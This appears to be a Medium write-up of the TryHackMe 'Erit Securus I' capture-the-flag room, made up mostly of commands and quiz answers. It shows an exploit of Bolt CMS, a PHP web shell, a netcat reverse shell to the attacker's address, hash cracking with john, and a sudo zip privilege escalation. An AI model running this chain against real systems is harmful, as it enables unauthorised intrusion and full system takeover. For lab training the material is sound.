Erit Securus I TryHackme Writeup

https://tryhackme.com/room/eritsecurusi

Information Gathering

Scanning

nmap -sV 10.10.196.105

Answer:2

Answer: 22,80

Enumeration

Answer: bolt

Gaining Access

python3 exploit.py http://10.10.116.95 admin password
echo '<?php system($_GET["cmd"]);?>'>cmd.php
ln -s $(which nc) .
python -m SimpleHTTPServer 80
http://10.10.196.105/files/cmd.php?cmd=chmod 755 nc
nc -nlvp 1234
http://10.10.196.105/files/cmd.php?cmd=./nc -e /bin/bash 10.2.12.26.1234
python -c 'import pty;pty.spawn("/bin/bash")'

Answer: www-data

Privilege Escalation

SELECT * FROM bolt_users;
john hash.txt -w=/usr/share/wordlists/rockyou.txt

Pivoting

Answer: (jsmith) NOPASSWD: /usr/bin/zip

Privilege Escalation #2

TF=$(mktemp -u)
sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #'
python -c 'import pty;pty.spawn("/bin/bash")'

Answer: ALL : ALL NOPASSWD: ALL

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store